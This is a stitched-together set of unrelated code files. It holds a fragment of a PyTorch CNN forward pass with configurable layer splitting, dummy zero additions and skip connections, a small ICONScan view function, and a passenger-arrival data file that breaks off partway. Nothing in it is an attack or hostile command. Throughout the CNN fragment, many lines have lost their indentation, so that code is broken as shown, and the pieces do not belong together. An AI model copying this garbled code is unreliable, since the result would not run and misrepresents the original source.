        if self.deepen_list is not None and self.deepen_list[21] == 1:
            X1 = self.relu(self.conv21_dp(X1))
        if self.skipcon_list is not None and self.skipcon_list[21] == 1:
            X1 = self.relu(self.conv21_sk(X1) + X1)
X0_skip = X1
X1_shape = X1.size()
        if self.decompo_list is not None:
if self.decompo_list[22] == 1:
X1_0 = self.conv22_0(X1)
X1_1 = self.conv22_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[22] == 2:
X1_0 = self.conv22_0(X1)
X1_1 = self.conv22_1(X1)
X1_2 = self.conv22_2(X1)
X1_3 = self.conv22_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
elif self.decompo_list[22] == 3:
X1_0 = self.conv22_0(X1[:, :int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_1 = self.conv22_1(X1[:, int(torch.floor_divide(X1_shape[1],2)):, :, :])
X1 = torch.add(X1_0, X1_1)
elif self.decompo_list[22] == 4:
X1_0 = self.conv22_0(X1[:, :int(torch.floor_divide(X1_shape[1],4)), :, :])
X1_1 = self.conv22_1(X1[:, int(torch.floor_divide(X1_shape[1],4)):int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_2 = self.conv22_2(X1[:, int(torch.floor_divide(X1_shape[1],2)):int(3*torch.floor_divide(X1_shape[1],4)), :, :])
X1_3 = self.conv22_3(X1[:, int(3*torch.floor_divide(X1_shape[1],4)):, :, :])
X1 = X1_0 + X1_1 + X1_2 + X1_3
else:
X1 = self.conv22(X1)
else:
X1 = self.conv22(X1)
        if self.dummy_list is not None and self.dummy_list[22] > 0:
            dummy = torch.zeros_like(X1)
            for _ in range(self.dummy_list[22]):
                X1 = X1 + dummy
        X1 = self.conv_bn22(X1)
        X1 = self.relu(X1)
        if self.deepen_list is not None and self.deepen_list[22] == 1:
            X1 = self.relu(self.conv22_dp(X1))
        if self.skipcon_list is not None and self.skipcon_list[22] == 1:
            X1 = self.relu(self.conv22_sk(X1) + X1)
X1_shape = X1.size()
        if self.decompo_list is not None:
if self.decompo_list[23] == 1:
X1_0 = self.conv23_0(X1)
X1_1 = self.conv23_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[23] == 2:
X1_0 = self.conv23_0(X1)
X1_1 = self.conv23_1(X1)
X1_2 = self.conv23_2(X1)
X1_3 = self.conv23_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
elif self.decompo_list[23] == 3:
X1_0 = self.conv23_0(X1[:, :int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_1 = self.conv23_1(X1[:, int(torch.floor_divide(X1_shape[1],2)):, :, :])
X1 = torch.add(X1_0, X1_1)
elif self.decompo_list[23] == 4:
X1_0 = self.conv23_0(X1[:, :int(torch.floor_divide(X1_shape[1],4)), :, :])
X1_1 = self.conv23_1(X1[:, int(torch.floor_divide(X1_shape[1],4)):int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_2 = self.conv23_2(X1[:, int(torch.floor_divide(X1_shape[1],2)):int(3*torch.floor_divide(X1_shape[1],4)), :, :])
X1_3 = self.conv23_3(X1[:, int(3*torch.floor_divide(X1_shape[1],4)):, :, :])
X1 = X1_0 + X1_1 + X1_2 + X1_3
else:
X1 = self.conv23(X1)
else:
X1 = self.conv23(X1)
        if self.dummy_list is not None and self.dummy_list[23] > 0:
            dummy = torch.zeros_like(X1)
            for _ in range(self.dummy_list[23]):
                X1 = X1 + dummy
        X1 = self.conv_bn23(X1)
X1_saved = X1
X1 = X0_skip
X1_shape = X1.size()
        if self.decompo_list is not None:
if self.decompo_list[24] == 1:
X1_0 = self.conv24_0(X1)
X1_1 = self.conv24_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[24] == 2:
X1_0 = self.conv24_0(X1)
X1_1 = self.conv24_1(X1)
X1_2 = self.conv24_2(X1)
X1_3 = self.conv24_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
elif self.decompo_list[24] == 3:
X1_0 = self.conv24_0(X1[:, :int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_1 = self.conv24_1(X1[:, int(torch.floor_divide(X1_shape[1],2)):, :, :])
X1 = torch.add(X1_0, X1_1)
elif self.decompo_list[24] == 4:
X1_0 = self.conv24_0(X1[:, :int(torch.floor_divide(X1_shape[1],4)), :, :])
X1_1 = self.conv24_1(X1[:, int(torch.floor_divide(X1_shape[1],4)):int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_2 = self.conv24_2(X1[:, int(torch.floor_divide(X1_shape[1],2)):int(3*torch.floor_divide(X1_shape[1],4)), :, :])
X1_3 = self.conv24_3(X1[:, int(3*torch.floor_divide(X1_shape[1],4)):, :, :])
X1 = X1_0 + X1_1 + X1_2 + X1_3
else:
X1 = self.conv24(X1)
else:
X1 = self.conv24(X1)
        if self.dummy_list is not None and self.dummy_list[24] > 0:
            dummy = torch.zeros_like(X1)
            for _ in range(self.dummy_list[24]):
                X1 = X1 + dummy
        X1 = self.conv_bn24(X1)
        X1 += X1_saved
        X1 = self.relu(X1)
        if self.deepen_list is not None and self.deepen_list[24] == 1:
            X1 = self.relu(self.conv24_dp(X1))
        if self.skipcon_list is not None and self.skipcon_list[24] == 1:
            X1 = self.relu(self.conv24_sk(X1) + X1)
X0_skip = X1
X1_shape = X1.size()
        if self.decompo_list is not None:
if self.decompo_list[25] == 1:
X1_0 = self.conv25_0(X1)
X1_1 = self.conv25_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[25] == 2:
X1_0 = self.conv25_0(X1)
X1_1 = self.conv25_1(X1)
X1_2 = self.conv25_2(X1)
X1_3 = self.conv25_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
elif self.decompo_list[25] == 3:
X1_0 = self.conv25_0(X1[:, :int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_1 = self.conv25_1(X1[:, int(torch.floor_divide(X1_shape[1],2)):, :, :])
X1 = torch.add(X1_0, X1_1)
elif self.decompo_list[25] == 4:
X1_0 = self.conv25_0(X1[:, :int(torch.floor_divide(X1_shape[1],4)), :, :])
X1_1 = self.conv25_1(X1[:, int(torch.floor_divide(X1_shape[1],4)):int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_2 = self.conv25_2(X1[:, int(torch.floor_divide(X1_shape[1],2)):int(3*torch.floor_divide(X1_shape[1],4)), :, :])
X1_3 = self.conv25_3(X1[:, int(3*torch.floor_divide(X1_shape[1],4)):, :, :])
X1 = X1_0 + X1_1 + X1_2 + X1_3
else:
X1 = self.conv25(X1)
else:
X1 = self.conv25(X1)
        if self.dummy_list is not None and self.dummy_list[25] > 0:
            dummy = torch.zeros_like(X1)
            for _ in range(self.dummy_list[25]):
                X1 = X1 + dummy
        X1 = self.conv_bn25(X1)
        X1 = self.relu(X1)
        if self.deepen_list is not None and self.deepen_list[25] == 1:
            X1 = self.relu(self.conv25_dp(X1))
        if self.skipcon_list is not None and self.skipcon_list[25] == 1:
            X1 = self.relu(self.conv25_sk(X1) + X1)
X1_shape = X1.size()
        if self.decompo_list is not None:
if self.decompo_list[26] == 1:
X1_0 = self.conv26_0(X1)
X1_1 = self.conv26_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[26] == 2:
X1_0 = self.conv26_0(X1)
X1_1 = self.conv26_1(X1)
X1_2 = self.conv26_2(X1)
X1_3 = self.conv26_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
elif self.decompo_list[26] == 3:
X1_0 = self.conv26_0(X1[:, :int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_1 = self.conv26_1(X1[:, int(torch.floor_divide(X1_shape[1],2)):, :, :])
X1 = torch.add(X1_0, X1_1)
elif self.decompo_list[26] == 4:
X1_0 = self.conv26_0(X1[:, :int(torch.floor_divide(X1_shape[1],4)), :, :])
X1_1 = self.conv26_1(X1[:, int(torch.floor_divide(X1_shape[1],4)):int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_2 = self.conv26_2(X1[:, int(torch.floor_divide(X1_shape[1],2)):int(3*torch.floor_divide(X1_shape[1],4)), :, :])
X1_3 = self.conv26_3(X1[:, int(3*torch.floor_divide(X1_shape[1],4)):, :, :])
X1 = X1_0 + X1_1 + X1_2 + X1_3
else:
X1 = self.conv26(X1)
else:
X1 = self.conv26(X1)
        if self.dummy_list is not None and self.dummy_list[26] > 0:
            dummy = torch.zeros_like(X1)
            for _ in range(self.dummy_list[26]):
                X1 = X1 + dummy
        X1 = self.conv_bn26(X1)
        X1 += X0_skip
        X1 = self.relu(X1)
        if self.deepen_list is not None and self.deepen_list[26] == 1:
            X1 = self.relu(self.conv26_dp(X1))
        if self.skipcon_list is not None and self.skipcon_list[26] == 1:
            X1 = self.relu(self.conv26_sk(X1) + X1)
X0_skip = X1
X1_shape = X1.size()
        if self.decompo_list is not None:
if self.decompo_list[27] == 1:
X1_0 = self.conv27_0(X1)
X1_1 = self.conv27_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[27] == 2:
X1_0 = self.conv27_0(X1)
X1_1 = self.conv27_1(X1)
X1_2 = self.conv27_2(X1)
X1_3 = self.conv27_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
elif self.decompo_list[27] == 3:
X1_0 = self.conv27_0(X1[:, :int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_1 = self.conv27_1(X1[:, int(torch.floor_divide(X1_shape[1],2)):, :, :])
X1 = torch.add(X1_0, X1_1)
elif self.decompo_list[27] == 4:
X1_0 = self.conv27_0(X1[:, :int(torch.floor_divide(X1_shape[1],4)), :, :])
X1_1 = self.conv27_1(X1[:, int(torch.floor_divide(X1_shape[1],4)):int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_2 = self.conv27_2(X1[:, int(torch.floor_divide(X1_shape[1],2)):int(3*torch.floor_divide(X1_shape[1],4)), :, :])
X1_3 = self.conv27_3(X1[:, int(3*torch.floor_divide(X1_shape[1],4)):, :, :])
X1 = X1_0 + X1_1 + X1_2 + X1_3
else:
X1 = self.conv27(X1)
else:
X1 = self.conv27(X1)
        if self.dummy_list is not None and self.dummy_list[27] > 0:
            dummy = torch.zeros_like(X1)
            for _ in range(self.dummy_list[27]):
                X1 = X1 + dummy
        X1 = self.conv_bn27(X1)
        X1 = self.relu(X1)
        if self.deepen_list is not None and self.deepen_list[27] == 1:
            X1 = self.relu(self.conv27_dp(X1))
        if self.skipcon_list is not None and self.skipcon_list[27] == 1:
            X1 = self.relu(self.conv27_sk(X1) + X1)
X1_shape = X1.size()
        if self.decompo_list is not None:
if self.decompo_list[28] == 1:
X1_0 = self.conv28_0(X1)
X1_1 = self.conv28_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[28] == 2:
X1_0 = self.conv28_0(X1)
X1_1 = self.conv28_1(X1)
X1_2 = self.conv28_2(X1)
X1_3 = self.conv28_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
elif self.decompo_list[28] == 3:
X1_0 = self.conv28_0(X1[:, :int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_1 = self.conv28_1(X1[:, int(torch.floor_divide(X1_shape[1],2)):, :, :])
X1 = torch.add(X1_0, X1_1)
elif self.decompo_list[28] == 4:
X1_0 = self.conv28_0(X1[:, :int(torch.floor_divide(X1_shape[1],4)), :, :])
X1_1 = self.conv28_1(X1[:, int(torch.floor_divide(X1_shape[1],4)):int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_2 = self.conv28_2(X1[:, int(torch.floor_divide(X1_shape[1],2)):int(3*torch.floor_divide(X1_shape[1],4)), :, :])
X1_3 = self.conv28_3(X1[:, int(3*torch.floor_divide(X1_shape[1],4)):, :, :])
X1 = X1_0 + X1_1 + X1_2 + X1_3
else:
X1 = self.conv28(X1)
else:
X1 = self.conv28(X1)
        if self.dummy_list is not None and self.dummy_list[28] > 0:
            dummy = torch.zeros_like(X1)
            for _ in range(self.dummy_list[28]):
                X1 = X1 + dummy
        X1 = self.conv_bn28(X1)
        X1 += X0_skip
        X1 = self.relu(X1)
        if self.deepen_list is not None and self.deepen_list[28] == 1:
            X1 = self.relu(self.conv28_dp(X1))
        if self.skipcon_list is not None and self.skipcon_list[28] == 1:
            X1 = self.relu(self.conv28_sk(X1) + X1)
X0_skip = X1
X1_shape = X1.size()
        if self.decompo_list is not None:
if self.decompo_list[29] == 1:
X1_0 = self.conv29_0(X1)
X1_1 = self.conv29_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[29] == 2:
X1_0 = self.conv29_0(X1)
X1_1 = self.conv29_1(X1)
X1_2 = self.conv29_2(X1)
X1_3 = self.conv29_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
elif self.decompo_list[29] == 3:
X1_0 = self.conv29_0(X1[:, :int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_1 = self.conv29_1(X1[:, int(torch.floor_divide(X1_shape[1],2)):, :, :])
X1 = torch.add(X1_0, X1_1)
elif self.decompo_list[29] == 4:
X1_0 = self.conv29_0(X1[:, :int(torch.floor_divide(X1_shape[1],4)), :, :])
X1_1 = self.conv29_1(X1[:, int(torch.floor_divide(X1_shape[1],4)):int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_2 = self.conv29_2(X1[:, int(torch.floor_divide(X1_shape[1],2)):int(3*torch.floor_divide(X1_shape[1],4)), :, :])
X1_3 = self.conv29_3(X1[:, int(3*torch.floor_divide(X1_shape[1],4)):, :, :])
X1 = X1_0 + X1_1 + X1_2 + X1_3
else:
X1 = self.conv29(X1)
else:
X1 = self.conv29(X1)
        if self.dummy_list is not None and self.dummy_list[29] > 0:
            dummy = torch.zeros_like(X1)
            for _ in range(self.dummy_list[29]):
                X1 = X1 + dummy
        X1 = self.conv_bn29(X1)
        X1 = self.relu(X1)
        if self.deepen_list is not None and self.deepen_list[29] == 1:
            X1 = self.relu(self.conv29_dp(X1))
        if self.skipcon_list is not None and self.skipcon_list[29] == 1:
            X1 = self.relu(self.conv29_sk(X1) + X1)
        X1_shape = X1.size()
        if self.decompo_list is not None:
            if self.decompo_list[30] == 1:
                X1_0 = self.conv30_0(X1)
                X1_1 = self.conv30_1(X1)
                X1 = torch.cat((X1_0, X1_1), 1)
            elif self.decompo_list[30] == 2:
                X1_0 = self.conv30_0(X1)
                X1_1 = self.conv30_1(X1)
                X1_2 = self.conv30_2(X1)
                X1_3 = self.conv30_3(X1)
                X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
            elif self.decompo_list[30] == 3:
                X1_0 = self.conv30_0(X1[:, :int(torch.floor_divide(X1_shape[1], 2)), :, :])
                X1_1 = self.conv30_1(X1[:, int(torch.floor_divide(X1_shape[1], 2)):, :, :])
                X1 = torch.add(X1_0, X1_1)
            elif self.decompo_list[30] == 4:
                X1_0 = self.conv30_0(X1[:, :int(torch.floor_divide(X1_shape[1], 4)), :, :])
                X1_1 = self.conv30_1(X1[:, int(torch.floor_divide(X1_shape[1], 4)):int(torch.floor_divide(X1_shape[1], 2)), :, :])
                X1_2 = self.conv30_2(X1[:, int(torch.floor_divide(X1_shape[1], 2)):int(3 * torch.floor_divide(X1_shape[1], 4)), :, :])
                X1_3 = self.conv30_3(X1[:, int(3 * torch.floor_divide(X1_shape[1], 4)):, :, :])
                X1 = X1_0 + X1_1 + X1_2 + X1_3
            else:
                X1 = self.conv30(X1)
        else:
            X1 = self.conv30(X1)
        if self.dummy_list is not None:
            if self.dummy_list[30] > 0:
                dummy = np.zeros(X1.size()).astype("float32")
                for i in range(self.dummy_list[30]):
                    X1 = torch.add(X1, torch.tensor(dummy, device=cuda_device))
        X1 = self.conv_bn30(X1)
        X1 += X0_skip
        X1 = self.relu(X1)
        if self.deepen_list is not None:
            if self.deepen_list[30] == 1:
                X1 = self.conv30_dp(X1)
                X1 = self.relu(X1)
        if self.skipcon_list is not None:
            if self.skipcon_list[30] == 1:
                X1_skip = X1
                X1 = self.conv30_sk(X1)
                X1 = self.relu(X1 + X1_skip)
        X0_skip = X1
        X1_shape = X1.size()
        if self.decompo_list is not None:
            if self.decompo_list[31] == 1:
                X1_0 = self.conv31_0(X1)
                X1_1 = self.conv31_1(X1)
                X1 = torch.cat((X1_0, X1_1), 1)
            elif self.decompo_list[31] == 2:
                X1_0 = self.conv31_0(X1)
                X1_1 = self.conv31_1(X1)
                X1_2 = self.conv31_2(X1)
                X1_3 = self.conv31_3(X1)
                X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
            elif self.decompo_list[31] == 3:
                X1_0 = self.conv31_0(X1[:, :int(torch.floor_divide(X1_shape[1], 2)), :, :])
                X1_1 = self.conv31_1(X1[:, int(torch.floor_divide(X1_shape[1], 2)):, :, :])
                X1 = torch.add(X1_0, X1_1)
            elif self.decompo_list[31] == 4:
                X1_0 = self.conv31_0(X1[:, :int(torch.floor_divide(X1_shape[1], 4)), :, :])
                X1_1 = self.conv31_1(X1[:, int(torch.floor_divide(X1_shape[1], 4)):int(torch.floor_divide(X1_shape[1], 2)), :, :])
                X1_2 = self.conv31_2(X1[:, int(torch.floor_divide(X1_shape[1], 2)):int(3 * torch.floor_divide(X1_shape[1], 4)), :, :])
                X1_3 = self.conv31_3(X1[:, int(3 * torch.floor_divide(X1_shape[1], 4)):, :, :])
                X1 = X1_0 + X1_1 + X1_2 + X1_3
            else:
                X1 = self.conv31(X1)
        else:
            X1 = self.conv31(X1)
        if self.dummy_list is not None:
            if self.dummy_list[31] > 0:
                dummy = np.zeros(X1.size()).astype("float32")
                for i in range(self.dummy_list[31]):
                    X1 = torch.add(X1, torch.tensor(dummy, device=cuda_device))
        X1 = self.conv_bn31(X1)
        X1 = self.relu(X1)
        if self.deepen_list is not None:
            if self.deepen_list[31] == 1:
                X1 = self.conv31_dp(X1)
                X1 = self.relu(X1)
        if self.skipcon_list is not None:
            if self.skipcon_list[31] == 1:
                X1_skip = X1
                X1 = self.conv31_sk(X1)
                X1 = self.relu(X1 + X1_skip)
        X1_shape = X1.size()
        if self.decompo_list is not None:
            if self.decompo_list[32] == 1:
                X1_0 = self.conv32_0(X1)
                X1_1 = self.conv32_1(X1)
                X1 = torch.cat((X1_0, X1_1), 1)
            elif self.decompo_list[32] == 2:
                X1_0 = self.conv32_0(X1)
                X1_1 = self.conv32_1(X1)
                X1_2 = self.conv32_2(X1)
                X1_3 = self.conv32_3(X1)
                X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
            elif self.decompo_list[32] == 3:
                X1_0 = self.conv32_0(X1[:, :int(torch.floor_divide(X1_shape[1], 2)), :, :])
                X1_1 = self.conv32_1(X1[:, int(torch.floor_divide(X1_shape[1], 2)):, :, :])
                X1 = torch.add(X1_0, X1_1)
            elif self.decompo_list[32] == 4:
                X1_0 = self.conv32_0(X1[:, :int(torch.floor_divide(X1_shape[1], 4)), :, :])
                X1_1 = self.conv32_1(X1[:, int(torch.floor_divide(X1_shape[1], 4)):int(torch.floor_divide(X1_shape[1], 2)), :, :])
                X1_2 = self.conv32_2(X1[:, int(torch.floor_divide(X1_shape[1], 2)):int(3 * torch.floor_divide(X1_shape[1], 4)), :, :])
                X1_3 = self.conv32_3(X1[:, int(3 * torch.floor_divide(X1_shape[1], 4)):, :, :])
                X1 = X1_0 + X1_1 + X1_2 + X1_3
            else:
                X1 = self.conv32(X1)
        else:
            X1 = self.conv32(X1)
        if self.dummy_list is not None:
            if self.dummy_list[32] > 0:
                dummy = np.zeros(X1.size()).astype("float32")
                for i in range(self.dummy_list[32]):
                    X1 = torch.add(X1, torch.tensor(dummy, device=cuda_device))
        X1 = self.conv_bn32(X1)
        X1 += X0_skip
        X1 = self.relu(X1)
        if self.deepen_list is not None:
            if self.deepen_list[32] == 1:
                X1 = self.conv32_dp(X1)
                X1 = self.relu(X1)
        if self.skipcon_list is not None:
            if self.skipcon_list[32] == 1:
                X1_skip = X1
                X1 = self.conv32_sk(X1)
                X1 = self.relu(X1 + X1_skip)
        X1 = self.avgpool(X1)
        X1 = X1.view(-1, 64)
        X1_shape = X1.size()
        if self.decompo_list is not None:
            if self.decompo_list[33] == 1:
                X1_0 = self.classifier_0(X1)
                X1_1 = self.classifier_1(X1)
                X1 = torch.cat((X1_0, X1_1), 1)
            elif self.decompo_list[33] == 3:
                X1_0 = self.classifier_0(X1[:, :int(torch.floor_divide(X1_shape[1], 2))])
                X1_1 = self.classifier_1(X1[:, int(torch.floor_divide(X1_shape[1], 2)):])
                X1 = torch.add(X1_0, X1_1)
            elif self.decompo_list[33] == 4:
                X1_0 = self.classifier_0(X1[:, :int(torch.floor_divide(X1_shape[1], 4))])
                X1_1 = self.classifier_1(X1[:, int(torch.floor_divide(X1_shape[1], 4)):int(torch.floor_divide(X1_shape[1], 2))])
                X1_2 = self.classifier_2(X1[:, int(torch.floor_divide(X1_shape[1], 2)):int(3 * torch.floor_divide(X1_shape[1], 4))])
                X1_3 = self.classifier_3(X1[:, int(3 * torch.floor_divide(X1_shape[1], 4)):])
                X1 = X1_0 + X1_1 + X1_2 + X1_3
            else:
                X1 = self.classifier(X1)
        else:
            X1 = self.classifier(X1)
        if self.dummy_list is not None:
            if self.dummy_list[33] > 0:
                dummy = np.zeros(X1.size()).astype("float32")
                for i in range(self.dummy_list[33]):
                    X1 = torch.add(X1, torch.tensor(dummy, device=cuda_device))
        X1 = self.logsoftmax(X1)
        return X1
batch_size = 1
input_features = 3072
torch.manual_seed(1234)
X = torch.randn(batch_size, input_features, device=cuda_device)
# Start Call Model
model = custom_cnn_7(input_features).to(cuda_device)
# End Call Model
model.eval()
new_out = model(X)
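The repeated `decompo` branches above split the channel dimension with `torch.floor_divide` and either concatenate or sum the per-branch outputs. A minimal standalone sketch of the halve-and-sum pattern (mode 3), using hypothetical small conv layers rather than the model's own:

```python
import torch
import torch.nn as nn

torch.manual_seed(0)

# Hypothetical input and branch convolutions (not the model's own layers).
x = torch.randn(1, 8, 4, 4)
half = x.size(1) // 2  # same split point as torch.floor_divide(shape[1], 2)
conv_a = nn.Conv2d(half, 16, kernel_size=3, padding=1, bias=False)
conv_b = nn.Conv2d(half, 16, kernel_size=3, padding=1, bias=False)

# Each branch sees half of the input channels; the partial outputs are summed.
y = conv_a(x[:, :half]) + conv_b(x[:, half:])
print(y.shape)  # torch.Size([1, 16, 4, 4])
```

Mode 4 is the same idea with four quarter-channel branches, and modes 1–2 instead run every branch on the full input and concatenate along dim 1.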

# public/app/views/transactions_count_per_day_big_icx_transfer.py
# (repo: iconation/ICONScan, license: Apache-2.0)
import json
def process(result):
    # Convert each row's timestamp to an ISO date string, dropping the first row.
    return [[r[0].isoformat(), r[1]] for r in result][1:]
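A quick usage sketch with made-up rows (the real `result` presumably comes from a database query returning `(datetime, count)` pairs; the sample data below is hypothetical):

```python
from datetime import date

def process(result):
    # Convert each row's timestamp to an ISO date string, dropping the first row.
    return [[r[0].isoformat(), r[1]] for r in result][1:]

# Hypothetical query result: (day, number of big ICX transfers that day).
rows = [(date(2021, 4, 19), 3), (date(2021, 4, 20), 12), (date(2021, 4, 21), 7)]
out = process(rows)
print(out)  # → [['2021-04-20', 12], ['2021-04-21', 7]]
```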
# instances/passenger_demand/pas-20210421-2109-int14000000000000001e/3.py
# (repo: LHcau/scheduling-shared-passenger-and-freight-transport-on-a-fixed-infrastructure, license: BSD-3-Clause)
"""
PASSENGERS
"""
numPassengers = 3225
passenger_arriving = (
(3, 5, 3, 4, 1, 0, 8, 9, 10, 7, 1, 0), # 0
(1, 14, 5, 2, 3, 0, 8, 7, 6, 2, 2, 0), # 1
(2, 9, 6, 5, 5, 0, 6, 13, 2, 2, 3, 0), # 2
(3, 9, 9, 1, 4, 0, 5, 7, 5, 5, 0, 0), # 3
(8, 10, 5, 3, 4, 0, 6, 7, 6, 4, 1, 0), # 4
(4, 9, 5, 3, 1, 0, 7, 6, 10, 7, 2, 0), # 5
(2, 7, 13, 6, 2, 0, 6, 3, 6, 2, 3, 0), # 6
(2, 8, 9, 2, 2, 0, 7, 6, 2, 8, 0, 0), # 7
(4, 7, 12, 6, 0, 0, 1, 7, 9, 4, 5, 0), # 8
(1, 10, 6, 3, 2, 0, 4, 5, 11, 6, 2, 0), # 9
(5, 2, 1, 3, 3, 0, 7, 4, 6, 2, 3, 0), # 10
(5, 8, 7, 7, 3, 0, 8, 8, 7, 5, 1, 0), # 11
(10, 5, 6, 4, 2, 0, 8, 9, 9, 7, 7, 0), # 12
(2, 8, 8, 1, 4, 0, 9, 9, 8, 6, 2, 0), # 13
(2, 10, 3, 7, 2, 0, 7, 10, 7, 4, 1, 0), # 14
(6, 7, 10, 5, 4, 0, 4, 4, 7, 8, 1, 0), # 15
(4, 9, 12, 5, 2, 0, 3, 5, 5, 3, 3, 0), # 16
(3, 11, 7, 2, 3, 0, 3, 5, 4, 7, 2, 0), # 17
(9, 10, 8, 2, 1, 0, 9, 5, 9, 7, 2, 0), # 18
(4, 11, 10, 4, 1, 0, 9, 9, 6, 2, 3, 0), # 19
(5, 10, 10, 4, 2, 0, 6, 12, 8, 4, 3, 0), # 20
(5, 6, 11, 4, 0, 0, 5, 3, 4, 5, 4, 0), # 21
(6, 12, 8, 5, 1, 0, 6, 9, 4, 2, 1, 0), # 22
(2, 5, 4, 3, 1, 0, 7, 6, 12, 5, 1, 0), # 23
(2, 6, 8, 4, 8, 0, 2, 13, 8, 3, 3, 0), # 24
(8, 10, 10, 1, 3, 0, 5, 4, 8, 3, 0, 0), # 25
(4, 8, 9, 4, 3, 0, 6, 10, 4, 6, 4, 0), # 26
(5, 9, 7, 4, 4, 0, 3, 13, 6, 3, 3, 0), # 27
(6, 12, 5, 8, 3, 0, 6, 6, 6, 4, 1, 0), # 28
(6, 9, 6, 1, 4, 0, 6, 8, 6, 7, 3, 0), # 29
(4, 8, 6, 4, 5, 0, 3, 14, 6, 4, 3, 0), # 30
(5, 8, 5, 3, 1, 0, 7, 8, 6, 6, 3, 0), # 31
(7, 6, 8, 2, 2, 0, 6, 10, 5, 9, 1, 0), # 32
(4, 12, 9, 8, 2, 0, 8, 12, 4, 4, 2, 0), # 33
(5, 6, 6, 3, 3, 0, 5, 7, 5, 7, 4, 0), # 34
(6, 9, 8, 3, 0, 0, 8, 11, 10, 2, 2, 0), # 35
(3, 6, 15, 4, 2, 0, 10, 9, 4, 1, 2, 0), # 36
(2, 4, 9, 2, 1, 0, 5, 10, 2, 7, 2, 0), # 37
(2, 6, 6, 4, 2, 0, 6, 5, 5, 8, 2, 0), # 38
(6, 10, 13, 4, 1, 0, 8, 9, 3, 7, 1, 0), # 39
(2, 10, 7, 10, 5, 0, 7, 15, 8, 4, 2, 0), # 40
(3, 8, 2, 6, 2, 0, 3, 3, 6, 9, 3, 0), # 41
(5, 10, 11, 5, 5, 0, 14, 9, 7, 2, 2, 0), # 42
(5, 8, 3, 6, 2, 0, 5, 12, 6, 10, 4, 0), # 43
(7, 8, 12, 5, 3, 0, 10, 9, 7, 6, 0, 0), # 44
(7, 8, 5, 4, 1, 0, 8, 12, 8, 5, 2, 0), # 45
(8, 12, 13, 4, 2, 0, 6, 3, 7, 4, 1, 0), # 46
(7, 11, 10, 4, 1, 0, 1, 4, 2, 3, 3, 0), # 47
(6, 5, 8, 2, 3, 0, 4, 10, 6, 5, 1, 0), # 48
(9, 14, 9, 6, 5, 0, 7, 7, 7, 5, 0, 0), # 49
(1, 12, 9, 1, 0, 0, 4, 8, 5, 1, 2, 0), # 50
(3, 8, 7, 3, 4, 0, 4, 5, 11, 5, 2, 0), # 51
(6, 8, 8, 5, 3, 0, 9, 8, 8, 9, 3, 0), # 52
(4, 7, 13, 3, 5, 0, 4, 5, 4, 5, 2, 0), # 53
(8, 7, 7, 2, 2, 0, 4, 9, 6, 2, 1, 0), # 54
(3, 9, 4, 4, 0, 0, 8, 4, 6, 8, 4, 0), # 55
(3, 9, 12, 2, 4, 0, 6, 4, 8, 5, 2, 0), # 56
(4, 9, 6, 7, 2, 0, 5, 7, 9, 3, 0, 0), # 57
(7, 5, 7, 5, 1, 0, 7, 10, 4, 5, 3, 0), # 58
(0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0), # 59
)
station_arriving_intensity = (
(3.7095121817383676, 9.515044981060607, 11.19193043059126, 8.87078804347826, 10.000240384615385, 6.659510869565219), # 0
(3.7443308140669203, 9.620858238197952, 11.252381752534994, 8.920190141908213, 10.075193108974359, 6.657240994867151), # 1
(3.7787518681104277, 9.725101964085297, 11.31139817195087, 8.968504830917876, 10.148564102564103, 6.654901690821256), # 2
(3.8127461259877085, 9.827663671875001, 11.368936576156813, 9.01569089673913, 10.22028605769231, 6.652493274456523), # 3
(3.8462843698175795, 9.928430874719417, 11.424953852470724, 9.061707125603865, 10.290291666666668, 6.6500160628019325), # 4
(3.879337381718857, 10.027291085770905, 11.479406888210512, 9.106512303743962, 10.358513621794872, 6.647470372886473), # 5
(3.9118759438103607, 10.12413181818182, 11.53225257069409, 9.150065217391306, 10.424884615384617, 6.644856521739131), # 6
(3.943870838210907, 10.218840585104518, 11.58344778723936, 9.19232465277778, 10.489337339743592, 6.64217482638889), # 7
(3.975292847039314, 10.311304899691358, 11.632949425164242, 9.233249396135266, 10.551804487179488, 6.639425603864735), # 8
(4.006112752414399, 10.401412275094698, 11.680714371786634, 9.272798233695653, 10.61221875, 6.636609171195653), # 9
(4.03630133645498, 10.489050224466892, 11.72669951442445, 9.310929951690824, 10.670512820512823, 6.633725845410628), # 10
